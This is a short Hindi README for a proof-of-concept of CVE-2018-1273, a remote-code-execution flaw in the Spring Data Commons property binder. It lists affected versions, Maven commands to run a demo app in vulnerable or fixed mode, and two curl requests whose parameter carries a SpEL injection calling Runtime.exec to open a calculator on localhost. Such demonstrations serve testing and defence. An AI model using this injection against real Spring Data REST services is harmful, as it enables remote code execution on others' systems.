
CVE-2018-1273 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, स्प्रिंग डेटा कॉमन्स प्रॉपर्टी बाइंडर में एक कमजोरी जो विशेष रूप से तैयार किए गए HTTP अनुरोध पैरामीटर्स के माध्यम से रिमोट कोड एक्जीक्यूशन की ओर ले जाती है।
Spring Data Commons, संस्करण 1.13 से 1.13.10, 2.0 से 2.0.5 और पुराने असमर्थित संस्करणों में, एक प्रॉपर्टी बाइंडर भेद्यता है जो विशेष तत्वों के अनुचित निष्प्रभावीकरण के कारण होती है। एक अप्रमाणित दूरस्थ दुर्भावनापूर्ण उपयोगकर्ता (या हमलावर) Spring Data REST द्वारा संचालित HTTP संसाधनों के विरुद्ध विशेष रूप से तैयार अनुरोध पैरामीटर प्रदान कर सकता है या Spring Data की प्रोजेक्शन-आधारित अनुरोध पेलोड बाइंडिंग का उपयोग कर सकता है, जो दूरस्थ कोड निष्पादन हमले का कारण बन सकता है।
अधिक जानकारी यहाँ
एप्लिकेशन को Spring Data Commons के भेद्य संस्करण या स्थिर संस्करण के साथ परीक्षण किया जा सकता है।
mvn spring-boot:run
mvn spring-boot:run -Dfixed
यह जाँचने के लिए निम्नलिखित कमांड चलाएँ कि क्या भेद्यता का शोषण किया जा सकता है:
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe')]=123"
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('/Applications/Calculator.app/Contents/MacOS/Calculator')]=test"
द्वारा निर्मित https://www.arima.eu
